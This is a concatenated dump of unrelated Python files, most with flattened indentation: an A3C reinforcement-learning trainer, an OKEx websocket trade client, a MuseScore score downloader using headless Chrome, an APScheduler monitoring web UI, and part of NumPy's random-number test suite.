env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
class ACNet(object):
def __init__(self, scope, globalAC=None):
if scope == GLOBAL_NET_SCOPE: # get global network
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_params, self.c_params = self._build_net(scope)[-2:]
else: # local net, calculate losses
with tf.variable_scope(scope):
self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
mu, sigma, self.v, self.a_params, self.c_params = self._build_net(scope)
td = tf.subtract(self.v_target, self.v, name='TD_error')
with tf.name_scope('c_loss'):
self.c_loss = tf.reduce_mean(tf.square(td))
with tf.name_scope('wrap_a_out'):
mu, sigma = mu * A_BOUND[1], sigma + 1e-4
normal_dist = tf.distributions.Normal(mu, sigma)
with tf.name_scope('a_loss'):
log_prob = normal_dist.log_prob(self.a_his)
exp_v = log_prob * tf.stop_gradient(td)
entropy = normal_dist.entropy() # encourage exploration
self.exp_v = ENTROPY_BETA * entropy + exp_v
self.a_loss = tf.reduce_mean(-self.exp_v)
with tf.name_scope('choose_a'): # use local params to choose action
self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1), axis=[0, 1]), A_BOUND[0], A_BOUND[1])
with tf.name_scope('local_grad'):
self.a_grads = tf.gradients(self.a_loss, self.a_params)
self.c_grads = tf.gradients(self.c_loss, self.c_params)
with tf.name_scope('sync'):
with tf.name_scope('pull'):
self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
with tf.name_scope('push'):
self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))
def _build_net(self, scope):
w_init = tf.random_normal_initializer(0., .1)
with tf.variable_scope('actor'):
l_a = tf.layers.dense(self.s, 200, tf.nn.relu6, kernel_initializer=w_init, name='la')
mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
with tf.variable_scope('critic'):
l_c = tf.layers.dense(self.s, 100, tf.nn.relu6, kernel_initializer=w_init, name='lc')
v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
return mu, sigma, v, a_params, c_params
def update_global(self, feed_dict): # run by a local
SESS.run([self.update_a_op, self.update_c_op], feed_dict) # local grads applies to global net
def pull_global(self): # run by a local
SESS.run([self.pull_a_params_op, self.pull_c_params_op])
def choose_action(self, s): # run by a local
s = s[np.newaxis, :]
return SESS.run(self.A, {self.s: s})
class Worker(object):
def __init__(self, name, globalAC):
self.env = gym.make(GAME).unwrapped
self.name = name
self.AC = ACNet(name, globalAC)
def work(self):
global GLOBAL_RUNNING_R, GLOBAL_EP
total_step = 1
buffer_s, buffer_a, buffer_r = [], [], []
while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
s = self.env.reset()
ep_r = 0
for ep_t in range(MAX_EP_STEP):
# if self.name == 'W_0':
# self.env.render()
a = self.AC.choose_action(s)
s_, r, done, info = self.env.step(a)
done = True if ep_t == MAX_EP_STEP - 1 else False
ep_r += r
buffer_s.append(s)
buffer_a.append(a)
buffer_r.append((r+8)/8) # normalize
if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
if done:
v_s_ = 0 # terminal
else:
v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
buffer_v_target = []
for r in buffer_r[::-1]: # reverse buffer r
v_s_ = r + GAMMA * v_s_
buffer_v_target.append(v_s_)
buffer_v_target.reverse()
buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
feed_dict = {
self.AC.s: buffer_s,
self.AC.a_his: buffer_a,
self.AC.v_target: buffer_v_target,
}
self.AC.update_global(feed_dict)
buffer_s, buffer_a, buffer_r = [], [], []
self.AC.pull_global()
s = s_
total_step += 1
if done:
if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
GLOBAL_RUNNING_R.append(ep_r)
else:
GLOBAL_RUNNING_R.append(0.9 * GLOBAL_RUNNING_R[-1] + 0.1 * ep_r)
print(
self.name,
"Ep:", GLOBAL_EP,
"| Ep_r: %i" % GLOBAL_RUNNING_R[-1],
)
GLOBAL_EP += 1
break
if __name__ == "__main__":
SESS = tf.Session()
with tf.device("/cpu:0"):
OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
workers = []
# Create worker
for i in range(N_WORKERS):
i_name = 'W_%i' % i # worker name
workers.append(Worker(i_name, GLOBAL_AC))
COORD = tf.train.Coordinator()
SESS.run(tf.global_variables_initializer())
if OUTPUT_GRAPH:
if os.path.exists(LOG_DIR):
shutil.rmtree(LOG_DIR)
tf.summary.FileWriter(LOG_DIR, SESS.graph)
worker_threads = []
for worker in workers:
job = lambda: worker.work()
t = threading.Thread(target=job)
t.start()
worker_threads.append(t)
COORD.join(worker_threads)
plt.plot(np.arange(len(GLOBAL_RUNNING_R)), GLOBAL_RUNNING_R)
plt.xlabel('step')
plt.ylabel('Total moving reward')
plt.show()
|
okex.py
|
# Import Built-Ins
import logging
import json
import threading
import time
# Import Third-Party
from websocket import create_connection, WebSocketTimeoutException,WebSocketConnectionClosedException
import requests
# Import Homebrew
from bitex.api.WSS.base import WSSAPI
from datetime import datetime
# Init Logging Facilities
log = logging.getLogger(__name__)
import zlib  # compression library, used to inflate OKEx websocket messages
class OkexWSS(WSSAPI):
def __init__(self,pair="XBTUSD"):
super(OkexWSS, self).__init__('wss://real.okex.com:10441/websocket', 'Okex')
self.conn = None
self.pairs = [pair.upper()]
self._data_thread = None
def start(self):
super(OkexWSS, self).start()
self._data_thread = threading.Thread(target=self._process_data)
self._data_thread.daemon = True
self._data_thread.start()
def stop(self):
if self.running:
super(OkexWSS, self).stop()
if self._data_thread:
self._data_thread.join()
self._data_thread = None
    # decompression helper: OKEx sends deflate-compressed frames
def inflate(self,data):
decompress = zlib.decompressobj(-zlib.MAX_WBITS)
inflated = decompress.decompress(data)
inflated += decompress.flush()
return inflated
def _process_data(self):
self.conn = create_connection(self.addr)
payload = json.dumps({'event':'addChannel','channel':'ok_sub_spot_btc_usdt_deals'})
self.conn.send(payload)
while self.running:
try:
message = self.conn.recv()
                inflated = self.inflate(message).decode('utf-8')  # decompress the data sent by OKEx
data_arr = json.loads(inflated)
log.debug(data_arr)
            except (WebSocketTimeoutException, ConnectionResetError, WebSocketConnectionClosedException):
                log.warning("restarted")
                self._controller_q.put('restart')
                time.sleep(3)
                continue
            except Exception as e:
                log.exception(e)
                continue
# {'table': 'trade', 'action': 'insert', 'data': [
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 28999,
# 'price': 3826.5, 'tickDirection': 'PlusTick', 'trdMatchID': '7d5089d5-486b-37cf-9b4c-0366e76f1ffc',
# 'grossValue': 757859866, 'homeNotional': 7.57859866, 'foreignNotional': 28999},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 7500,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '3a374212-dc3c-4b2b-eb3b-10fc270cfb7a',
# 'grossValue': 196005000, 'homeNotional': 1.96005, 'foreignNotional': 7500},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 40,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': 'a586232f-e634-bb4a-db90-4af1f73481c1',
# 'grossValue': 1045360, 'homeNotional': 0.0104536, 'foreignNotional': 40},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 40,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': 'f93e0576-5cd2-35a5-0bf6-50d5361f01db',
# 'grossValue': 1045360, 'homeNotional': 0.0104536, 'foreignNotional': 40},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 10000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '74c8bddb-d264-0fec-ae24-1bbe11263cae',
# 'grossValue': 261340000, 'homeNotional': 2.6134, 'foreignNotional': 10000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 36000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '6395d9a1-64cb-4ad4-4710-a60d0db8d770',
# 'grossValue': 940824000, 'homeNotional': 9.40824, 'foreignNotional': 36000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 10000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '8816e23f-0d6d-5993-40a8-8aa3f331b806',
# 'grossValue': 261340000, 'homeNotional': 2.6134, 'foreignNotional': 10000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 5000,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': '263cb99d-983d-abc4-05e0-1b337a700495',
# 'grossValue': 130670000, 'homeNotional': 1.3067, 'foreignNotional': 5000},
# {'timestamp': '2018-12-04T03:26:49.976Z', 'symbol': 'XBTUSD', 'side': 'Buy', 'size': 30336,
# 'price': 3826.5, 'tickDirection': 'ZeroPlusTick', 'trdMatchID': 'a7bf787b-14ad-4778-e3c2-c58a7928a6fe',
# 'grossValue': 792801024, 'homeNotional': 7.92801024, 'foreignNotional': 30336}]}
for data in data_arr:
if 'channel' in data:
type = data['channel']
# reason = data['reason']
if type == 'ok_sub_spot_btc_usdt_deals':
tradedatas = data['data']
for tradedata in tradedatas:
log.debug(tradedata)
amount = float(tradedata[2])
if tradedata[4] == "ask":
amount = -amount
date_str = (tradedata[3])
                            # tradedata[3] is a time-of-day string, e.g. "14:38:33", parsed with %H:%M:%S below
ts = datetime.strptime(date_str, '%H:%M:%S')
now = datetime.now()
ts = ts.replace(year=now.year,month=now.month,day=now.day)
timestamp = (ts - datetime(1970, 1, 1)).total_seconds()
# print("ts %s" % timestamp)
self.data_q.put(('trades',
timestamp, amount, float(tradedata[1]),))
self.conn = None
|
musescore.py
|
from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from bs4 import BeautifulSoup
from cairosvg.surface import PDFSurface
from cairosvg.parser import Tree
from cairosvg import svg2pdf
from typing import Union, Optional
from io import BytesIO
from tqdm import tqdm
# import proxyscrape
import threading
import cairocffi
import requests
import cairo
import json
import time
import os
class PageNotFound(Exception):
pass
def download(user: Optional[Union[int, str]] = None,
score: Optional[Union[int, str]] = None,
url: Optional[str] = None,
dpi: int = 40):
def fetch(src):
nonlocal results, pbar
resp = requests.get(src, stream = True)
data = resp.content
        try:
            surf = PDFSurface(Tree(bytestring = data), None, dpi)
        except Exception:
            # not an SVG page; fall back to loading the payload as a PNG
            surf = cairo.ImageSurface.create_from_png(BytesIO(data))
results[src] = surf
pbar.update(1)
if url is None:
if user is None:
url = f"https://musescore.com/score/{score}"
else:
url = f"https://musescore.com/user/{user}/scores/{score}"
if not os.path.exists('scores'):
os.mkdir('scores')
# collector = proxyscrape.create_collector('default', 'http')
# proxy = collector.get_proxy({'country': 'united states', 'anonymous': True})
try:
options = webdriver.ChromeOptions()
options.headless = True
options.add_argument("--window-size=1920,1080")
# options.add_argument(f'--proxy-server={proxy.host}:{proxy.port}')
driver = webdriver.Chrome(options = options)
driver.get(url)
resp = requests.get(url)
if resp.status_code == 404:
raise PageNotFound("The score could not be found.")
while True:
try:
title = driver.find_element_by_class_name('_3ke60').text
pages = len(driver.find_element_by_class_name('JQKO_').find_elements_by_xpath("*")) - 2
fpath = os.path.join('scores', title + '.pdf')
break
except KeyboardInterrupt:
break
except Exception as e:
time.sleep(0.1)
continue
surface = cairocffi.PDFSurface(fpath, 1, 1)
context = cairocffi.Context(surface)
urls = []
pbar = tqdm(desc = 'Fetching image URL for each page in the score', total = pages, leave = False)
for page in range(pages):
driver.execute_script(f'document.getElementsByClassName("vAVs3")[{page}].scrollIntoView()')
sheet = driver.find_elements_by_class_name('vAVs3')[page]
while True:
try:
src = sheet.find_elements_by_xpath("*")[0].get_attribute('src')
if src is None:
continue
urls.append(src)
pbar.update(1)
break
except KeyboardInterrupt:
break
except Exception:
continue
results = {}
threads = []
pbar = tqdm(desc = 'Fetching image contents', total = pages, leave = False)
for src in urls:
thread = threading.Thread(target = fetch, args = (src,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
for src in tqdm(urls, 'Constructing PDF', leave = False):
image_surface = results[src]
surface.set_size(image_surface.width, image_surface.height)
context.set_source_surface(image_surface.cairo, 0, 0)
context.paint()
surface.show_page()
except Exception:
# Remove any partially written PDF (fpath may be unbound if the failure
# happened before the score title was resolved), then re-raise so the
# caller can handle the original error (e.g. PageNotFound).
if 'fpath' in locals() and os.path.exists(fpath):
os.remove(fpath)
raise
finally:
try:
surface.finish()
except Exception:
pass
try:
driver.close()
except Exception:
pass
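# --- usage sketch (illustrative only) ---
# The ids below are hypothetical placeholders; a real run needs chromedriver on
# PATH plus the cairo/cairosvg dependencies imported above, and writes the PDF
# into the local 'scores' directory.
if __name__ == '__main__':
    # Either pass the full score URL directly...
    download(url='https://musescore.com/user/12345/scores/67890', dpi=40)
    # ...or let download() build the same URL from a user id and score id:
    # download(user=12345, score=67890)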
|
web.py
|
import logging
import threading
from datetime import datetime
import flask
import flask_socketio
from apscheduler.jobstores.base import JobLookupError
from apscheduler.triggers.cron import CronTrigger
from apscheduler.triggers.interval import IntervalTrigger
from flask import Response
from apschedulerui.watcher import SchedulerWatcher, SchedulerEventsListener
from apschedulerui.patch import patch_scheduler
class SchedulerUI(SchedulerEventsListener):
"""
A web server that monitors your scheduler and serves a web application to visualize events.
By default the web application served is a view-only UI; enabling capabilities allows it to control the
scheduler and its jobs.
Args:
scheduler (apscheduler.schedulers.base.BaseScheduler):
The scheduler to monitor.
capabilities (dict):
(Optional)
A dictionary of the capabilities to enable in the server and client. By default the UI is view-only.
Supported capabilities:
* Pause/Resume Scheduler: set `pause_scheduler` to :data:`True`.
* Stop/Start Scheduler: set `stop_scheduler` to :data:`True`.
* Pause/Resume Jobs: set `pause_job` to :data:`True`.
* Remove Jobs: set `remove_job` to :data:`True`.
* Run Jobs on demand: set `run_job` to :data:`True`.
operation_timeout (float):
(Optional) The number of seconds to wait for the serializing lock when performing actions on the
scheduler or on its jobs from the UI.
Basic Usage:
>>> from apscheduler.schedulers.background import BackgroundScheduler
>>> from apschedulerui.web import SchedulerUI
>>> scheduler = BackgroundScheduler()
>>> ui = SchedulerUI(scheduler)
>>> ui.start() # Server available at localhost:5000.
Configuring capabilities:
>>> ui = SchedulerUI(scheduler, capabilities={'pause_scheduler': True}) # All omitted capabilities are False.
>>> ui = SchedulerUI(scheduler, capabilities={'pause_job': True, 'remove_job': True})
"""
def __init__(self, scheduler, capabilities=None, operation_timeout=1):
self.scheduler = scheduler
patch_scheduler(scheduler)
self.capabilities = {
'pause_job': False,
'remove_job': False,
'pause_scheduler': False,
'stop_scheduler': False,
'run_job': False,
}
if not (isinstance(operation_timeout, int) or isinstance(operation_timeout, float)):
raise TypeError('operation_timeout should be either an int or a float')
if operation_timeout <= 0:
raise ValueError('operation_timeout should be a positive number')
self.operation_timeout = operation_timeout
if capabilities is not None:
if isinstance(capabilities, dict):
self.capabilities.update(capabilities)
else:
raise TypeError('capabilities should be a dict of str -> bool pairs')
self._scheduler_listener = SchedulerWatcher(scheduler)
self._web_server = flask.Flask(__name__)
self._socket_io = None
try:
# TODO: see if we can support eventlet in the future.
self._socket_io = flask_socketio.SocketIO(self._web_server, async_mode='gevent')
except ValueError:
self._socket_io = flask_socketio.SocketIO(self._web_server, async_mode='threading')
self._init_endpoints()
self._web_server_thread = None
self._scheduler_lock = threading.Lock()
def start(self, host='0.0.0.0', port=5000, daemon=True):
"""
Starts listening for events from the scheduler and starts the web server that serves the UI in a new thread.
Args:
host (str):
(Optional) The address to bind the web server to. Default `0.0.0.0`.
port (int):
(Optional) The port to which the web server will bind. Defaults to :data:`5000`.
daemon (bool):
(Optional) If :data:`True` (default), the web server thread is started as a daemon thread.
"""
self._scheduler_listener.add_listener(self)
self._web_server_thread = threading.Thread(target=self._start, name='apscheduler-ui', args=(host, port))
self._web_server_thread.daemon = daemon
self._web_server_thread.start()
def _init_endpoints(self):
if self.capabilities.get('pause_scheduler', False):
self._web_server.add_url_rule(
'/api/scheduler/pause', 'pause_scheduler', self._pause_scheduler, methods=['POST']
)
self._web_server.add_url_rule(
'/api/scheduler/resume', 'resume_scheduler', self._resume_scheduler, methods=['POST']
)
if self.capabilities.get('stop_scheduler', False):
self._web_server.add_url_rule(
'/api/scheduler/stop', 'stop_scheduler', self._stop_scheduler, methods=['POST']
)
self._web_server.add_url_rule(
'/api/scheduler/start', 'start_scheduler', self._start_scheduler, methods=['POST']
)
if self.capabilities.get('remove_job', False):
self._web_server.add_url_rule('/api/job/<job_id>/remove', 'remove_job', self._remove_job, methods=['POST'])
if self.capabilities.get('pause_job', False):
self._web_server.add_url_rule('/api/job/<job_id>/pause', 'pause_job', self._pause_job, methods=['POST'])
self._web_server.add_url_rule('/api/job/<job_id>/resume', 'resume_job', self._resume_job, methods=['POST'])
if self.capabilities.get('run_job', False):
self._web_server.add_url_rule('/api/job/<job_id>/run_now', 'run_job', self._run_job, methods=['POST'])
self._web_server.add_url_rule('/', 'index', self._index, defaults={'path': ''})
self._web_server.add_url_rule('/<path:path>', 'index', self._index)
self._socket_io.on_event('connected', self._client_connected)
def _index(self, path):
return self._web_server.send_static_file('index.html')
def _exec_scheduler_command(self, func, *args, **kwargs):
if self._scheduler_lock.acquire(timeout=self.operation_timeout):
try:
func(*args, **kwargs)
return 'ok'
except JobLookupError:
flask.abort(404, description="Job not found")
finally:
self._scheduler_lock.release()
else:
flask.abort(408, description="Failed to acquire scheduler lock to perform operation")
def _pause_scheduler(self):
return self._exec_scheduler_command(self.scheduler.pause)
def _resume_scheduler(self):
return self._exec_scheduler_command(self.scheduler.resume)
def _stop_scheduler(self):
return self._exec_scheduler_command(self.scheduler.shutdown, wait=False)
def _start_scheduler(self):
return self._exec_scheduler_command(self.scheduler.start)
def _pause_job(self, job_id):
return self._exec_scheduler_command(self.scheduler.pause_job, job_id)
def _resume_job(self, job_id):
return self._exec_scheduler_command(self.scheduler.resume_job, job_id)
def _run_job(self, job_id, next_run_time=None):
logging.getLogger('apschedulerui').info('Running job %s' % job_id)
if not job_id:
return Response(status=404)
if not next_run_time:
next_run_time = datetime.now()
def _run_job_impl():
job = self.scheduler.get_job(job_id)
if not job:
raise JobLookupError(job_id)
# If a job is periodic (has an interval or cron trigger), trigger it early by moving up its
# next_run_time so the recurring schedule is preserved. Otherwise, reschedule it as a one-shot
# 'date' job that runs now.
if isinstance(job.trigger, IntervalTrigger) or isinstance(job.trigger, CronTrigger):
self.scheduler.modify_job(job_id, next_run_time=next_run_time)
else:
job.reschedule(trigger='date', run_date=next_run_time)
return self._exec_scheduler_command(_run_job_impl)
def _remove_job(self, job_id):
return self._exec_scheduler_command(self.scheduler.remove_job, job_id)
def _client_connected(self):
logging.getLogger('apschedulerui').debug('Client connected')
flask_socketio.emit('init_jobs', self._scheduler_listener.scheduler_summary())
flask_socketio.emit('init_capabilities', self.capabilities)
def _job_event(self, event):
self._socket_io.emit('job_event', event)
def _scheduler_event(self, event):
self._socket_io.emit('scheduler_event', event)
def _jobstore_event(self, event):
self._socket_io.emit('jobstore_event', event)
def _executor_event(self, event):
self._socket_io.emit('executor_event', event)
def _start(self, host, port):
self._socket_io.run(self._web_server, host=host, port=port)
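# --- usage sketch (illustrative only) ---
# Mirrors the docstring example above: a BackgroundScheduler with one sample
# interval job, monitored by a UI that may also pause the scheduler and its
# jobs. The job body and its 30-second interval are arbitrary placeholders.
if __name__ == '__main__':
    import time
    from apscheduler.schedulers.background import BackgroundScheduler

    def sample_job():
        logging.getLogger('apschedulerui').info('sample_job executed')

    scheduler = BackgroundScheduler()
    scheduler.add_job(sample_job, 'interval', seconds=30, id='sample_job')
    scheduler.start()

    ui = SchedulerUI(scheduler, capabilities={'pause_scheduler': True, 'pause_job': True})
    ui.start()  # serves the UI at http://0.0.0.0:5000 in a daemon thread

    while True:  # keep the main thread alive so the daemon threads keep running
        time.sleep(1)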
|
test_randomstate.py
|
import hashlib
import pickle
import sys
import warnings
import numpy as np
import pytest
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_warns,
assert_no_warnings, assert_array_equal, assert_array_almost_equal,
suppress_warnings
)
from numpy.random import MT19937, PCG64
from numpy import random
INT_FUNCS = {'binomial': (100.0, 0.6),
'geometric': (.5,),
'hypergeometric': (20, 20, 10),
'logseries': (.5,),
'multinomial': (20, np.ones(6) / 6.0),
'negative_binomial': (100, .5),
'poisson': (10.0,),
'zipf': (2,),
}
if np.iinfo(int).max < 2**32:
# Windows and some 32-bit platforms, e.g., ARM
INT_FUNC_HASHES = {'binomial': '670e1c04223ffdbab27e08fbbad7bdba',
'logseries': '6bd0183d2f8030c61b0d6e11aaa60caf',
'geometric': '6e9df886f3e1e15a643168568d5280c0',
'hypergeometric': '7964aa611b046aecd33063b90f4dec06',
'multinomial': '68a0b049c16411ed0aa4aff3572431e4',
'negative_binomial': 'dc265219eec62b4338d39f849cd36d09',
'poisson': '7b4dce8e43552fc82701c2fa8e94dc6e',
'zipf': 'fcd2a2095f34578723ac45e43aca48c5',
}
else:
INT_FUNC_HASHES = {'binomial': 'b5f8dcd74f172836536deb3547257b14',
'geometric': '8814571f45c87c59699d62ccd3d6c350',
'hypergeometric': 'bc64ae5976eac452115a16dad2dcf642',
'logseries': '84be924b37485a27c4a98797bc88a7a4',
'multinomial': 'ec3c7f9cf9664044bb0c6fb106934200',
'negative_binomial': '210533b2234943591364d0117a552969',
'poisson': '0536a8850c79da0c78defd742dccc3e0',
'zipf': 'f2841f504dd2525cd67cdcad7561e532',
}
@pytest.fixture(scope='module', params=INT_FUNCS)
def int_func(request):
return (request.param, INT_FUNCS[request.param],
INT_FUNC_HASHES[request.param])
def assert_mt19937_state_equal(a, b):
assert_equal(a['bit_generator'], b['bit_generator'])
assert_array_equal(a['state']['key'], b['state']['key'])
assert_array_equal(a['state']['pos'], b['state']['pos'])
assert_equal(a['has_gauss'], b['has_gauss'])
assert_equal(a['gauss'], b['gauss'])
class TestSeed:
def test_scalar(self):
s = random.RandomState(0)
assert_equal(s.randint(1000), 684)
s = random.RandomState(4294967295)
assert_equal(s.randint(1000), 419)
def test_array(self):
s = random.RandomState(range(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState(np.arange(10))
assert_equal(s.randint(1000), 468)
s = random.RandomState([0])
assert_equal(s.randint(1000), 973)
s = random.RandomState([4294967295])
assert_equal(s.randint(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, -0.5)
assert_raises(ValueError, random.RandomState, -1)
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, random.RandomState, [-0.5])
assert_raises(ValueError, random.RandomState, [-1])
assert_raises(ValueError, random.RandomState, [4294967296])
assert_raises(ValueError, random.RandomState, [1, 2, 4294967296])
assert_raises(ValueError, random.RandomState, [1, -2, 4294967296])
def test_invalid_array_shape(self):
# gh-9832
assert_raises(ValueError, random.RandomState, np.array([],
dtype=np.int64))
assert_raises(ValueError, random.RandomState, [[1, 2, 3]])
assert_raises(ValueError, random.RandomState, [[1, 2, 3],
[4, 5, 6]])
def test_cannot_seed(self):
rs = random.RandomState(PCG64(0))
with assert_raises(TypeError):
rs.seed(1234)
def test_invalid_initialization(self):
assert_raises(ValueError, random.RandomState, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.randint(-5, -1) < -1)
x = random.randint(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.random_state = random.RandomState(self.seed)
self.state = self.random_state.get_state()
def test_basic(self):
old = self.random_state.tomaxint(16)
self.random_state.set_state(self.state)
new = self.random_state.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(self.state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.random_state.standard_normal()
state = self.random_state.get_state()
old = self.random_state.standard_normal(size=3)
self.random_state.set_state(state)
new = self.random_state.standard_normal(size=3)
assert_(np.all(old == new))
def test_backwards_compatibility(self):
# Make sure we can accept old state tuples that do not have the
# cached Gaussian value.
old_state = self.state[:-2]
x1 = self.random_state.standard_normal(size=16)
self.random_state.set_state(old_state)
x2 = self.random_state.standard_normal(size=16)
self.random_state.set_state(self.state)
x3 = self.random_state.standard_normal(size=16)
assert_(np.all(x1 == x2))
assert_(np.all(x1 == x3))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.random_state.negative_binomial(0.5, 0.5)
def test_get_state_warning(self):
rs = random.RandomState(PCG64())
with suppress_warnings() as sup:
w = sup.record(RuntimeWarning)
state = rs.get_state()
assert_(len(w) == 1)
assert isinstance(state, dict)
assert state['bit_generator'] == 'PCG64'
def test_invalid_legacy_state_setting(self):
state = self.random_state.get_state()
new_state = ('Unknown', ) + state[1:]
assert_raises(ValueError, self.random_state.set_state, new_state)
assert_raises(TypeError, self.random_state.set_state,
np.array(new_state, dtype=object))
state = self.random_state.get_state(legacy=False)
del state['bit_generator']
assert_raises(ValueError, self.random_state.set_state, state)
def test_pickle(self):
self.random_state.seed(0)
self.random_state.random_sample(100)
self.random_state.standard_normal()
pickled = self.random_state.get_state(legacy=False)
assert_equal(pickled['has_gauss'], 1)
rs_unpick = pickle.loads(pickle.dumps(self.random_state))
unpickled = rs_unpick.get_state(legacy=False)
assert_mt19937_state_equal(pickled, unpickled)
def test_state_setting(self):
attr_state = self.random_state.__getstate__()
self.random_state.standard_normal()
self.random_state.__setstate__(attr_state)
state = self.random_state.get_state(legacy=False)
assert_mt19937_state_equal(attr_state, state)
def test_repr(self):
assert repr(self.random_state).startswith('RandomState(MT19937)')
class TestRandint:
rfunc = random.randint
# valid integer/boolean types
itype = [np.bool_, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self):
assert_raises(TypeError, self.rfunc, 1, dtype=float)
def test_bounds_checking(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, dtype=dt)
def test_rng_zero_and_extremes(self):
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
